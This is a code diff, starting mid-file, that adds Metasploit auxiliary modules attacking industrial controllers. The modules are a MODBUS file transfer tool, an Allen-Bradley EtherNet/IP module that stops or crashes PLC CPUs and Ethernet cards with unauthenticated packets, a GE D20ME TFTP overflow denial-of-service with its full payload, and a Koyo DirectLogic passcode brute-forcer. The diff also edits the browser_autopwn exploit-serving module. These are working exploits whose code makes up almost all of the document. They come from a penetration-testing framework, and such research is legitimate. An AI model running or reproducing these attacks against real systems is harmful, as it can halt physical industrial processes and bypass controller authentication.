+			payload += "\x00" + [lastblocksize].pack("c") + "\x00"
+			payload += buf[((block-1) * 244)..(((block-1) * 244) + lastblocksize)]
+			vprint_status "#{rhost}:#{rport} - MODBUS - Block #{block}: #{payload.inspect}"
+			res = sendframe(makeframe(payload))
+			if res[8..9] != "\x01\xfe"
+				print_error("#{rhost}:#{rport} - MODBUS - Failure writing last block")
+				return
+			end
+		end
+		vprint_status "#{rhost}:#{rport} - MODBUS - Closing file"
+		payload = "\x00\x5a\x01\x32\x00\x01" + [fileblocks].pack("c") + "\x00"
+		sendframe(makeframe(payload))
+	end
+
+	# Only reading the STL file is supported at the moment :(
+	def readfile
+		print_status "#{rhost}:#{rport} - MODBUS - Sending read request"
+		file = File.open(datastore['FILENAME'], 'wb')
+		payload = "\x00\x5a\x01\x33\x00\x01\xfb\x00"
+		response = sendframe(makeframe(payload))
+		print_status("#{rhost}:#{rport} - MODBUS - Retrieving file")
+		block = 1
+		filedata = ""
+		finished = false
+		while !finished
+			payload = "\x00\x5a\x01\x34\x00\x01"
+			payload += [block].pack("c")
+			payload += "\x00"
+			response = sendframe(makeframe(payload))
+			filedata += response[0xe..-1]
+			vprint_status "#{rhost}:#{rport} - MODBUS - Block #{block}: #{response[0xe..-1].inspect}"
+			if response[0xa] == "\x01" # apparently 0x00 == more data, 0x01 == eof?
+				finished = true
+			else
+				block += 1
+			end
+		end
+		print_status("#{rhost}:#{rport} - MODBUS - Closing file")
+		payload = "\x00\x5a\x01\x35\x00\x01" + [block].pack("c") + "\x00"
+		sendframe(makeframe(payload))
+		file.print filedata
+		file.close
+	end
+
+	def cleanup
+		disconnect rescue nil
+	end
+
+end
@@ -0,0 +1,145 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::Tcp
+	include Rex::Socket::Tcp
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => 'Allen-Bradley/Rockwell Automation EtherNet/IP CIP Commands',
+			'Description'    => %q{
+				The EtnerNet/IP CIP protocol allows a number of unauthenticated commands to a PLC which
+				implements the protocol.  This module implements the CPU STOP command, as well as
+				the ability to crash the Ethernet card in an affected device.
+
+				This module is based on the original 'ethernetip-multi.rb' Basecamp module
+				from DigitalBond.
+			},
+			'Author'         =>
+				[
+					'Ruben Santamarta <ruben[at]reversemode.com>',
+					'K. Reid Wightman <wightman[at]digitalbond.com>', # original module
+					'todb' # Metasploit fixups
+				],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ]
+				],
+			'Version'        => '$Revision$',
+			'DisclosureDate' => 'Jan 19 2012'))
+
+		register_options(
+			[
+				Opt::RPORT(44818),
+				# Note that OptEnum is case sensitive
+				OptEnum.new("ATTACK", [true, "The attack to use.", "STOPCPU",
+					[
+						"STOPCPU",
+						"CRASHCPU",
+						"CRASHETHER",
+						"RESETETHER"
+					]
+				])
+			], self.class
+		)
+	end
+
+	def run
+		attack = datastore["ATTACK"]
+		print_status "#{rhost}:#{rport} - CIP - Running #{attack} attack."
+		sid = req_session
+		if sid
+			forge_packet(sid, payload(attack))
+			print_status "#{rhost}:#{rport} - CIP - #{attack} attack complete."
+		end
+	end
+
+	def forge_packet(sessionid, payload)
+		packet = ""
+		packet += "\x6f\x00" # command: Send request/reply data
+		packet += [payload.size - 0x10].pack("v") # encap length (2 bytes)
+		packet += [sessionid].pack("N") # session identifier (4 bytes)
+		packet += payload #payload part
+		begin
+			sock.put(packet)
+		rescue ::Interrupt
+			print_error("#{rhost}:#{rport} - CIP - Interrupt during payload")
+			raise $!
+		rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused
+			print_error("#{rhost}:#{rport} - CIP - Network error during payload")
+			return nil
+		end
+	end
+
+	def req_session
+		begin
+			connect
+			packet = ""
+			packet += "\x65\x00" # ENCAP_CMD_REGISTERSESSION (2 bytes)
+			packet += "\x04\x00" # encaph_length (2 bytes)
+			packet += "\x00\x00\x00\x00" # session identifier (4 bytes)
+			packet += "\x00\x00\x00\x00" # status code (4 bytes)
+			packet += "\x00\x00\x00\x00\x00\x00\x00\x00" # context information (8 bytes)
+			packet += "\x00\x00\x00\x00" # options flags (4 bytes)
+			packet += "\x01\x00" # proto (2 bytes)
+			packet += "\x00\x00" # flags (2 bytes)
+			sock.put(packet)
+			response = sock.get_once
+			if response
+				session_id = response[4..8].unpack("N")[0] rescue nil# bare minimum of parsing done
+				if session_id
+					print_status("#{rhost}:#{rport} - CIP - Got session id: 0x"+session_id.to_s(16))
+				else
+					print_error("#{rhost}:#{rport} - CIP - Got invalid session id, aborting.")
+					return nil
+				end
+			else
+				raise ::Rex::ConnectionTimeout
+			end
+		rescue ::Interrupt
+			print_error("#{rhost}:#{rport} - CIP - Interrupt during session negotation")
+			raise $!
+		rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused => e
+			print_error("#{rhost}:#{rport} - CIP - Network error during session negotiation: #{e}")
+			return nil
+		end
+		return session_id
+	end
+
+	def cleanup
+		disconnect rescue nil
+	end
+
+	def payload(attack)
+		case attack
+		when "STOPCPU"
+			payload =  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + #encapsulation -[payload.size-0x10]-
+			"\x00\x00\x00\x00\x02\x00\x02\x00\x00\x00\x00\x00\xb2\x00\x1a\x00" + #packet1
+			"\x52\x02\x20\x06\x24\x01\x03\xf0\x0c\x00\x07\x02\x20\x64\x24\x01" + #packet2
+			"\xDE\xAD\xBE\xEF\xCA\xFE\x01\x00\x01\x00"                           #packet3
+		when "CRASHCPU"
+			payload = "\x00\x00\x00\x00\x02\x00\x02\x00\x00\x00\x00\x00\xb2\x00\x1a\x00" +
+			"\x52\x02\x20\x06\x24\x01\x03\xf0\x0c\x00\x0a\x02\x20\x02\x24\x01" +
+			"\xf4\xf0\x09\x09\x88\x04\x01\x00\x01\x00"
+		when "CRASHETHER"
+			payload = "\x00\x00\x00\x00\x20\x00\x02\x00\x00\x00\x00\x00\xb2\x00\x0c\x00" +
+			"\x0e\x03\x20\xf5\x24\x01\x10\x43\x24\x01\x10\x43"
+		when "RESETETHER"
+			payload = "\x00\x00\x00\x00\x00\x04\x02\x00\x00\x00\x00\x00\xb2\x00\x08\x00" +
+			"\x05\x03\x20\x01\x24\x01\x30\x03"
+		else
+			print_error("#{rhost}:#{rport} - CIP - Invalid attack option.")
+			return nil
+		end
+	end
+
+end
@@ -0,0 +1,140 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+##
+# The General Electric D20 (and possibly other devices) have numerous
+# buffer overruns in their TFTP servers and probably other servers.
+# There are many buffer overruns like it, but this one is the D20's
+# TFTP Server transfer-mode overflow.
+# The filename also suffers from an overrun but seems unlikely to be
+# exploitable.
+##
+
+
+require 'msf/core'
+require 'rex/ui/text/shell'
+require 'rex/proto/tftp'
+
+class Metasploit3 < Msf::Auxiliary
+	include Rex::Ui::Text
+	include Rex::Proto::TFTP
+	include Msf::Exploit::Remote::Udp
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'General Electric D20ME TFTP Server Buffer Overflow DoS',
+			'Description'    => %q{
+				By sending a malformed TFTP request to the GE D20ME, it is possible to crash the
+				device.
+
+				This module is based on the original 'd20ftpbo.rb' Basecamp module from
+				DigitalBond.
+				},
+			'Author'         =>
+				[ 
+					'K. Reid Wightman <wightman[at]digitalbond.com>', # original module
+					'todb' # Metasploit fixups
+				],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ]
+				],
+			'Version'        => '$Revision$',
+			'DisclosureDate' => 'Jan 19 2012',
+			))
+
+		register_options(
+			[
+				OptAddress.new('LHOST', [false, "The local IP address to bind to"]),
+				OptInt.new('RECV_TIMEOUT', [false, "Time (in seconds) to wait between packets", 3]),
+				Opt::RPORT(69)
+			], self.class)
+	end
+
+	def run
+		udp_sock = Rex::Socket::Udp.create(
+			'LocalHost' => datastore['LHOST'] || nil,
+			'PeerHost'  => rhost, 
+			'PeerPort' => rport,
+			'Context' => {'Msf' => framework, 'MsfExploit' => self}
+		) # No need to rescue, it's a UDP faux-socket
+		udp_sock.sendto(payload, rhost, rport)
+		recv = udp_sock.timed_read(65535, recv_timeout) 
+		if recv and recv.size > 0
+			udp_sock.sendto(payload, rhost, rport)
+		else
+			print_error "#{rhost}:#{rport} - TFTP - No response from the target, aborting."
+			return
+		end
+		print_good "#{rhost}:#{rport} - TFTP - DoS complete, the D20 should fault after a timeout."
+	end
+
+	def recv_timeout
+		if datastore['RECV_TIMEOUT'].to_i.zero?
+			3
+		else
+			datastore['RECV_TIMEOUT'].to_i.abs
+		end
+	end
+
+	def payload 
+		"\x00\x01NVRAM\\D20.zlb\x00netascii" +
+			"\x80\x80\x80\x80\x80\x80\x80\x81\x80\x80\x80\x82\x80\x80\x80\x83" +
+			"\x80\x80\x80\x84\x80\x80\x80\x85\x80\x80\x80\x86\x80\x80\x80\x87\x80\x80\x80\x88" +
+			"\x80\x80\x80\x89\x80\x80\x80\x8A\x80\x80\x80\x8B\x80\x80\x80\x8C\x80\x80\x80\x8D" +
+			"\x80\x80\x80\x8E\x80\x80\x80\x8F\x80\x80\x80\x90\x80\x80\x80\x91\x80\x80\x80\x92" +
+			"\x80\x80\x80\x93\x80\x80\x80\x94\x80\x80\x80\x95\x80\x80\x80\x96\x80\x80\x80\x97" +
+			"\x80\x80\x80\x98\x80\x80\x80\x99\x80\x80\x80\x9A\x80\x80\x80\x9B\x80\x80\x80\x9C" +
+			"\x80\x80\x80\x9D\x80\x80\x80\x9E\x80\x80\x80\x9F\x80\x80\x80\xA0\x80\x80\x80\xA1" +
+			"\x80\x80\x80\xA2\x80\x80\x80\xA3\x80\x80\x80\xA4\x80\x80\x80\xA5\x80\x80\x80\xA6" +
+			"\x80\x80\x80\xA7\x80\x80\x80\xA8\x80\x80\x80\x00\x80\x80\x80\xAA\x80\x80\x80\xAB" +
+			"\x80\x80\x80\xAC\x80\x80\x80\xAD\x80\x80\x80\xAE\x80\x80\x80\xAF\x80\x80\x80\xB0" +
+			"\x80\x80\x80\xB1\x80\x80\x80\xB2\x80\x80\x80\xB3\x80\x80\x80\xB4\x80\x80\x80\xB5" +
+			"\x80\x80\x80\xB6\x80\x80\x80\xB7\x80\x80\x80\xB8\x80\x80\x80\xB9\x80\x80\x80\xBA" +
+			"\x80\x80\x80\xBB\x80\x80\x80\xBC\x80\x80\x80\xBD\x80\x80\x80\xBE\x80\x80\x80\xBF" +
+			"\x80\x80\x80\xC0\x80\x80\x80\xC1\x80\x80\x80\xC2\x80\x80\x80\xC3\x80\x80\x80\xC4" +
+			"\x80\x80\x80\xC5\x80\x80\x80\xC6\x80\x80\x80\xC7\x80\x80\x80\xC8\x80\x80\x80\xC9" +
+			"\x80\x80\x80\xCA\x80\x80\x80\xCB\x80\x80\x80\xCC\x80\x80\x80\xCD\x80\x80\x80\xCE" +
+			"\x80\x80\x80\xCF\x80\x80\x80\xD0\x80\x80\x80\xD1\x80\x80\x80\xD2\x80\x80\x80\xD3" +
+			"\x80\x80\x80\xD4\x80\x80\x80\xD5\x80\x80\x80\xD6\x80\x80\x80\xD7\x80\x80\x80\xD8" +
+			"\x80\x80\x80\xD9\x80\x80\x80\xDA\x80\x80\x80\xDB\x80\x80\x80\xDC\x80\x80\x80\xDD" +
+			"\x80\x80\x80\xDE\x80\x80\x80\x00\x00\x00\x80\x00\x00\x01\x80\xE1\x80\x80\x80\xE2" +
+			"\x80\x80\x80\xE3\x80\x80\x80\xE4\x80\x80\x80\xE5\x80\x80\x80\xE6\x80\x80\x80\xE7" +
+			"\x80\x80\x80\xE8\x80\x80\x80\xE9\x80\x80\x80\xEA\x80\x80\x80\xEB\x80\x80\x80\xEC" +
+			"\x80\x80\x00\x80\x00\x00\x00\x7F\xFF\xBC\x80\xEF\x80\x80\x80\xF0\x80\x80\x80\xF1" +
+			"\x80\x80\x80\xF2\x80\x80\x80\xF3\x80\x80\x80\xF4\x80\x80\x80\xF5\x80\x80\x80\xF6" +
+			"\x80\x80\x80\xF7\x80\x80\x80\xF8\x80\x80\x80\xF9\x80\x80\x80\xFA\x80\x80\x80\xFB" +
+			"\x80\x80\x80\xFC\x80\x80\x80\xFD\x80\x80\x80\xFE\x80\x80\x81\x80\x80\x80\x81\x81" +
+			"\x80\x80\x81\x82\x80\x80\x81\x83\x80\x80\x81\x84\x80\x80\x81\x85\x80\x80\x81\x86" +
+			"\x80\x80\x81\x87\x80\x80\x81\x88\x80\x80\x81\x89\x80\x80\x81\x8A\x80\x80\x81\x8B" +
+			"\x80\x80\x81\x8C\x80\x80\x81\x8D\x80\x80\x81\x8E\x80\x80\x81\x8F\x80\x80\x81\x90" +
+			"\x80\x80\x81\x91\x80\x80\x81\x92\x80\x80\x81\x93\x80\x80\x81\x94\x80\x80\x81\x95" +
+			"\x80\x80\x81\x96\x80\x80\x81\x97\x80\x80\x81\x98\x80\x80\x81\x99\x80\x80\x81\x9A" +
+			"\x80\x80\x81\x9B\x80\x80\x81\x9C\x80\x80\x81\x9D\x80\x80\x81\x9E\x80\x80\x81\x9F" +
+			"\x80\x80\x81\xA0\x80\x80\x81\xA1\x80\x80\x81\xA2\x80\x80\x81\xA3\x80\x80\x81\xA4" +
+			"\x80\x80\x81\xA5\x80\x80\x81\xA6\x80\x80\x81\xA7\x80\x80\x81\xA8\x80\x80\x81\xA9" +
+			"\x80\x80\x81\xAA\x80\x80\x81\xAB\x80\x80\x81\xAC\x80\x80\x81\xAD\x80\x80\x81\xAE" +
+			"\x80\x80\x81\xAF\x80\x80\x81\xB0\x80\x80\x81\xB1\x80\x80\x81\xB2\x80\x80\x81\xB3" +
+			"\x80\x80\x81\xB4\x80\x80\x81\xB5\x80\x80\x81\xB6\x80\x80\x81\xB7\x80\x80\x81\xB8" +
+			"\x80\x80\x81\xB9\x80\x80\x81\xBA\x80\x80\x81\xBB\x80\x80\x81\xBC\x80\x80\x81\xBD" +
+			"\x80\x80\x81\xBE\x80\x80\x81\xBF\x80\x80\x81\xC0\x80\x80\x81\xC1\x80\x80\x81\xC2" +
+			"\x80\x80\x81\xC3\x80\x80\x81\xC4\x80\x80\x81\xC5\x80\x80\x81\xC6\x80\x80\x81\xC7" +
+			"\x80\x80\x81\xC8\x80\x80\x81\xC9\x80\x80\x81\xCA\x80\x80\x81\xCB\x80\x80\x81\xCC" +
+			"\x80\x80\x81\xCD\x80\x80\x81\xCE\x80\x80\x81\xCF\x80\x80\x81\xD0\x80\x80\x81\xD1" +
+			"\x80\x80\x81\xD2\x80\x80\x81\xD3\x80\x80\x81\xD4\x80\x80\x81\xD5\x80\x80\x81\xD6" +
+			"\x80\x80\x81\xD7\x80\x80\x81\xD8\x80\x80\x81\xD9\x80\x80\x81\xDA\x80\x80\x81\xDB" +
+			"\x80\x80\x81\xDC\x80\x80\x81\xDD\x80\x80\x81\xDE\x80\x80\x81\xDF\x80\x80\x81\xE0" +
+			"\x80\x80\x81\xE1\x80\x80\x81\xE2\x80\x80\x81\xE3\x80\x80\x81\xE4\x80\x80\x81\xE5" +
+			"\x80\x80\x81\xE6\x80\x80\x81\xE7\x80\x80\x81\xE8\x80\x80\x81\xE9\x80\x80\x81\xEA" +
+			"\x80\x80\x81\xEB\x80\x80\x81\xEC\x80\x80\x81\xED\x80\x80\x81\xEE\x80\x80\x81\xEF" +
+			"\x80\x80\x81\xF0\x80\x80\x81\xF1\x80\x80\x81\xF2\x80\x80\x81\xF3\x80\x80\x81\xF4" +
+			"\x80\x80\x81\xF5\x80\x80\x81\xF6\x80\x80\x81\xF7\x80\x80\x81\xF8\x80\x80\x81\xF9" +
+			"\x80\x80\x81\xFA\x80\x80\x81\xFB\x80\x80\x81\xFC\x80\x80\x81\xFD\x80\x80\x81\xFE" +
+			"\x80\x80\x82\x80\x80\x80\x82\x81" 
+	end
+
+end
@@ -0,0 +1,188 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+# msfdev is going to want a bunch of other stuff for style/compat but this works
+# TODO: Make into a real AuthBrute module, although the password pattern is fixed
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::Udp
+	include Msf::Auxiliary::Report
+	include Msf::Auxiliary::Scanner
+
+	def initialize
+		super(
+			'Name'           => 'Koyo DirectLogic PLC Password Brute Force Utility',
+			'Version'        => '$Revision$',
+			'Description'    => %q{
+				This module attempts to authenticate to
+				a locked Koyo DirectLogic PLC.  The PLC uses a restrictive
+				passcode, which can be A0000000 through A9999999.
+
+				This module is based on the original 'koyobrute.rb' Basecamp module from
+				DigitalBond.
+			},
+			'Author'         =>
+				[
+					'K. Reid Wightman <wightman[at]digitalbond.com>', # original module
+					'todb' # Metasploit fixups
+				],
+			'DisclosureDate' => 'Jan 19 2012',
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ]
+				],
+		)
+
+		register_options(
+			[
+				OptAddress.new('LHOST', [false, "The local IP address to bind to"]),
+				OptInt.new('RECV_TIMEOUT', [false, "Time (in seconds) to wait between packets", 3]),
+				Opt::RPORT(28784)
+			], self.class)
+
+		@CCITT_16 = [
+			0x0000, 0x1021, 0x2042, 0x3063, 0x4084, 0x50A5, 0x60C6, 0x70E7,
+			0x8108, 0x9129, 0xA14A, 0xB16B, 0xC18C, 0xD1AD, 0xE1CE, 0xF1EF,
+			0x1231, 0x0210, 0x3273, 0x2252, 0x52B5, 0x4294, 0x72F7, 0x62D6,
+			0x9339, 0x8318, 0xB37B, 0xA35A, 0xD3BD, 0xC39C, 0xF3FF, 0xE3DE,
+			0x2462, 0x3443, 0x0420, 0x1401, 0x64E6, 0x74C7, 0x44A4, 0x5485,
+			0xA56A, 0xB54B, 0x8528, 0x9509, 0xE5EE, 0xF5CF, 0xC5AC, 0xD58D,
+			0x3653, 0x2672, 0x1611, 0x0630, 0x76D7, 0x66F6, 0x5695, 0x46B4,
+			0xB75B, 0xA77A, 0x9719, 0x8738, 0xF7DF, 0xE7FE, 0xD79D, 0xC7BC,
+			0x48C4, 0x58E5, 0x6886, 0x78A7, 0x0840, 0x1861, 0x2802, 0x3823,
+			0xC9CC, 0xD9ED, 0xE98E, 0xF9AF, 0x8948, 0x9969, 0xA90A, 0xB92B,
+			0x5AF5, 0x4AD4, 0x7AB7, 0x6A96, 0x1A71, 0x0A50, 0x3A33, 0x2A12,
+			0xDBFD, 0xCBDC, 0xFBBF, 0xEB9E, 0x9B79, 0x8B58, 0xBB3B, 0xAB1A,
+			0x6CA6, 0x7C87, 0x4CE4, 0x5CC5, 0x2C22, 0x3C03, 0x0C60, 0x1C41,
+			0xEDAE, 0xFD8F, 0xCDEC, 0xDDCD, 0xAD2A, 0xBD0B, 0x8D68, 0x9D49,
+			0x7E97, 0x6EB6, 0x5ED5, 0x4EF4, 0x3E13, 0x2E32, 0x1E51, 0x0E70,
+			0xFF9F, 0xEFBE, 0xDFDD, 0xCFFC, 0xBF1B, 0xAF3A, 0x9F59, 0x8F78,
+			0x9188, 0x81A9, 0xB1CA, 0xA1EB, 0xD10C, 0xC12D, 0xF14E, 0xE16F,
+			0x1080, 0x00A1, 0x30C2, 0x20E3, 0x5004, 0x4025, 0x7046, 0x6067,
+			0x83B9, 0x9398, 0xA3FB, 0xB3DA, 0xC33D, 0xD31C, 0xE37F, 0xF35E,
+			0x02B1, 0x1290, 0x22F3, 0x32D2, 0x4235, 0x5214, 0x6277, 0x7256,
+			0xB5EA, 0xA5CB, 0x95A8, 0x8589, 0xF56E, 0xE54F, 0xD52C, 0xC50D,
+			0x34E2, 0x24C3, 0x14A0, 0x0481, 0x7466, 0x6447, 0x5424, 0x4405,
+			0xA7DB, 0xB7FA, 0x8799, 0x97B8, 0xE75F, 0xF77E, 0xC71D, 0xD73C,
+			0x26D3, 0x36F2, 0x0691, 0x16B0, 0x6657, 0x7676, 0x4615, 0x5634,
+			0xD94C, 0xC96D, 0xF90E, 0xE92F, 0x99C8, 0x89E9, 0xB98A, 0xA9AB,
+			0x5844, 0x4865, 0x7806, 0x6827, 0x18C0, 0x08E1, 0x3882, 0x28A3,
+			0xCB7D, 0xDB5C, 0xEB3F, 0xFB1E, 0x8BF9, 0x9BD8, 0xABBB, 0xBB9A,
+			0x4A75, 0x5A54, 0x6A37, 0x7A16, 0x0AF1, 0x1AD0, 0x2AB3, 0x3A92,
+			0xFD2E, 0xED0F, 0xDD6C, 0xCD4D, 0xBDAA, 0xAD8B, 0x9DE8, 0x8DC9,
+			0x7C26, 0x6C07, 0x5C64, 0x4C45, 0x3CA2, 0x2C83, 0x1CE0, 0x0CC1,
+			0xEF1F, 0xFF3E, 0xCF5D, 0xDF7C, 0xAF9B, 0xBFBA, 0x8FD9, 0x9FF8,
+			0x6E17, 0x7E36, 0x4E55, 0x5E74, 0x2E93, 0x3EB2, 0x0ED1, 0x1EF0
+		]
+	end
+
+	def run_host(ip)
+		@udp_sock ||= {}
+		@udp_sock[ip] = Rex::Socket::Udp.create(
+			'LocalHost' => datastore['LHOST'] || nil,
+			'PeerHost'  => ip, 
+			'PeerPort' => rport,
+			'Context' => {'Msf' => framework, 'MsfExploit' => self}
+		)
+		print_status("#{ip}:#{rport} - KOYO - Checking the controller for locked memory...")
+		if unlock_check(ip)
+			print_good("#{ip}:#{rport} - Unlocked!")
+			return
+		else
+			print_status("#{ip}:#{rport} - KOYO - Controller locked; commencing bruteforce...")
+		end
+
+		# TODO: Consider sort_by {rand} in order to avoid sequential guessing
+		# or something fancier
+		(0..9999999).each do |i|
+
+			passcode = 'A' + i.to_s.rjust(7,'0')
+			vprint_status("#{ip}:#{rport} - KOYO - Trying #{passcode}")
+
+			bytes = passcode.scan(/../).map { |x| x.to_i(16) }
+			passstr = bytes.pack("c*")
+			print_debug passstr.inspect
+
+			res = try_auth(ip, passstr)
+			if res
+				print_good "#{ip}:#{rport} - KOYO - Found passcode: #{passcode}"
+				report_auth_info( 
+				:host => ip,
+				:port => rport,
+				:proto => 'udp',
+				:user => '',
+				:pass => passcode, # NOTE: Human readable
+				:active => true
+			)
+				break
+			end
+		end
+	end
+
+	def crc16(buf, crc=0)
+		buf.each_byte{|x| crc = ((crc<<8) ^ @CCITT_16[(crc>>8) ^ x])&0xffff}
+		[crc].pack("S")
+	end
+
+	def unlock_check(ip)
+		checkpacket = "HAP\xe6\x01\x6e\x68\x0d\x00\x1a\x00\x09\x00\x01\x50\x01\x02\x00\x01\x00\x17\x52"
+		@udp_sock[ip].sendto(checkpacket, ip, datastore['RPORT'].to_i)
+
+		recvpacks = 0
+		# TODO: Since the packet count is critical, consider using Capture instead,
+		# but that requires root which is mildly annoying and not cross-platform.
+		# IOW, not a hugely good way to solve this via packet counting, given the nature
+		# of UDP.
+		#
+		# Another way to speed things up is to use fancy threading, but that's for another
+		# day.
+		while (r = @udp_sock[ip].recvfrom(65535, 0.1) and recvpacks < 2)
+			res = r[0]
+			if res.length == 269 # auth reply packet
+				if res[17] == "\x00" and res[19] == "\xD2" # Magic bytes
+					return true
+				end
+			end
+			recvpacks += 1
+		end
+		return false
+	end
+
+	def try_auth(ip, passstr)
+		data = "\x1a\x00\x0d\x00\x01\x51\x01\x19\x02\x04\x00" + passstr + "\x17\xaf"
+		header = "HAP"
+		header += "\xe5\x01" # random session ID
+		header += crc16(data)
+		header += [data.length].pack("S")
+		authpacket = header + data
+
+		@udp_sock[ip].sendto(authpacket, ip, datastore['RPORT'].to_i, 0)
+
+		2.times { @udp_sock[ip].get(recv_timeout) } # talk to the hand
+
+		status = unlock_check(ip)
+
+		return status
+	end
+
+	def recv_timeout
+		if datastore['RECV_TIMEOUT'].to_i.zero?
+			3
+		else
+			datastore['RECV_TIMEOUT'].to_i.abs
+		end
+	end
+
+	def cleanup
+		@udp_sock.each_pair { |ip,sock| sock.shutdown rescue nil}
+	end
+
+end
@@ -225,7 +225,7 @@ class Metasploit3 < Msf::Auxiliary
 			}

 			function bodyOnLoad() {
-				var detected_version = getVersion();
+				var detected_version = window.os_detect.getVersion();
 				//#{js_debug('detected_version')}
 				report_and_get_exploits(detected_version);
 			} // function bodyOnLoad
@@ -242,7 +242,11 @@ class Metasploit3 < Msf::Auxiliary
 						return str;
 					}
 					function debug(msg) {
-						document.body.innerHTML += (msg + "<br />\\n");
+						foo = document.getElementById("foo");
+						bar = document.createTextNode(msg);
+						foo.appendChild(bar);
+						bar = document.createElement("br");
+						foo.appendChild(bar);
 					}
 				}
 			ENDJS
@@ -259,6 +263,7 @@ class Metasploit3 < Msf::Auxiliary
 		@init_html << %Q|<!-- \n #{@init_js} //-->|
 		@init_html << %Q|</script> </head> |
 		@init_html << %Q|<body onload="#{@init_js.sym("bodyOnLoad")}()"> |
+		@init_html << %Q|<div id="foo"></div> |
 		@init_html << %Q|<noscript> \n|
 		# Don't use build_iframe here because it will break detection in
 		# DefangedDetection mode when the target has js disabled.
@@ -554,7 +559,6 @@ class Metasploit3 < Msf::Auxiliary
 				response = create_response()
 				response.body = "#{js_debug("'Please wait'")}"
 			else
-				print_status("Responding with exploits")
 				response = build_script_response(cli, request)
 			end
 			response["Expires"] = "0"
@@ -573,7 +577,6 @@ class Metasploit3 < Msf::Auxiliary
 				response = create_response()
 				response.body = "Please wait"
 			else
-				print_status("Responding with non-javascript exploits")
 				response = build_noscript_response(cli, request)
 			end

@@ -605,6 +608,7 @@ class Metasploit3 < Msf::Auxiliary
 		client_info = get_client(:host => cli.peerhost, :ua_string => request['User-Agent'])
 		body = ""

+		sploit_cnt = 0
 		@noscript_tests.each { |browser, sploits|
 			next if sploits.length == 0

@@ -613,7 +617,9 @@ class Metasploit3 < Msf::Auxiliary
 			sploits.each do |s|
 				body << html_for_exploit( s, client_info )
 			end
+			sploit_cnt += 1
 		}
+		print_status("#{cli.peerhost.ljust 16} Responding with #{sploit_cnt} non-javascript exploits")
 		body
 	end

@@ -643,8 +649,11 @@ class Metasploit3 < Msf::Auxiliary
 		response['Expires'] = '0'
 		response['Cache-Control'] = 'must-revalidate'

-		host_info   = get_host(:host => cli.peerhost)
+		# Host info no longer comes from the database! This is strictly a value
+		# that came back from javascript OS detection because NAT basically
+		# makes it impossible to keep host/client mappings straight.
 		client_info = get_client(:host => cli.peerhost, :ua_string => request['User-Agent'])
+		host_info   = client_info[:host]
 		#print_status("Client info: #{client_info.inspect}")

 		js = "var global_exploit_list = []\n";
@@ -723,6 +732,13 @@ class Metasploit3 < Msf::Auxiliary
 				// from working.
 				try {
 					var test = global_exploit_list[exploit_idx].test;
+					// Debugging
+					//tn = document.createTextNode("Test " + exploit_idx +"\\n");
+					//br = document.createElement("br");
+					//document.body.appendChild(tn);
+					//document.body.appendChild(br);
+					//tn = document.createTextNode(test);
+					//document.body.appendChild(tn);
 					if (!test) {
 						test = "true";
 					} else {
@@ -739,12 +755,14 @@ class Metasploit3 < Msf::Auxiliary
 						next_exploit(exploit_idx+1);
 					}
 				} catch(e) {
-					#{js_debug("'test threw an exception, trying next one'")}
+					#{js_debug("'test threw an exception: ' + e.message + '<br />'")}
 					next_exploit(exploit_idx+1);
 				};
 			};
 		ENDJS

+		sploits_for_this_client = []
+		sploit_cnt = 0
 		# if we have no client_info, this will add all tests. Otherwise tries
 		# to only send tests for exploits that target the client's detected
 		# browser.
@@ -764,11 +782,10 @@ class Metasploit3 < Msf::Auxiliary

 					# Skip exploits that don't match the client's OS.
 					if (host_info and host_info[:os_name] and s[:os_name])
-						# Host os normalization will set os_name to "Unknown"
-						# if it has no fingerprinting info.
-						#
-						# See lib/msf/core/model/host.rb
-						if host_info[:os_name] != "Unknown"
+						# Reject exploits whose OS doesn't match that of the
+						# victim. Note that host_info comes from javascript OS
+						# detection, NOT the database.
+						if host_info[:os_name] != "undefined"
 							next unless s[:os_name].include?(host_info[:os_name])
 						end
 					end
@@ -776,6 +793,8 @@ class Metasploit3 < Msf::Auxiliary
 					js << "  'test':'#{test}',\n"
 					js << "  'resource':'#{res}'\n"
 					js << "};\n"
+					sploits_for_this_client.push s[:name]
+					sploit_cnt += 1
 				end
 			end
 		}
@@ -799,6 +818,8 @@ class Metasploit3 < Msf::Auxiliary
 					# check for in javascript, throw it on the pile.
 					noscript_html << html_for_exploit(s, client_info)
 				end
+				sploits_for_this_client.push s[:name]
+				sploit_cnt += 1
 			end
 		}

@@ -808,6 +829,9 @@ class Metasploit3 < Msf::Auxiliary
 		js << Rex::Text.to_hex(noscript_html, "%")
 		js << %Q|";\n|
 		js << %Q|var noscript_div = document.createElement("div");\n|
+		# Have to use innerHTML here to render the new iframes. Using
+		# document.createElement and appendChild() will escape all the
+		# entities.
 		js << %Q|noscript_div.innerHTML = unescape(noscript_exploits);\n|
 		js << %Q|document.body.appendChild(noscript_div);\n|

@@ -819,6 +843,10 @@ class Metasploit3 < Msf::Auxiliary

 		response.body = "#{js}"

+		print_status("#{cli.peerhost.ljust 16} Responding with #{sploit_cnt} exploits")
+		sploits_for_this_client.each do |name|
+			vprint_status("#{cli.peerhost.ljust 16} - #{name}")
+		end
 		return response
 	end

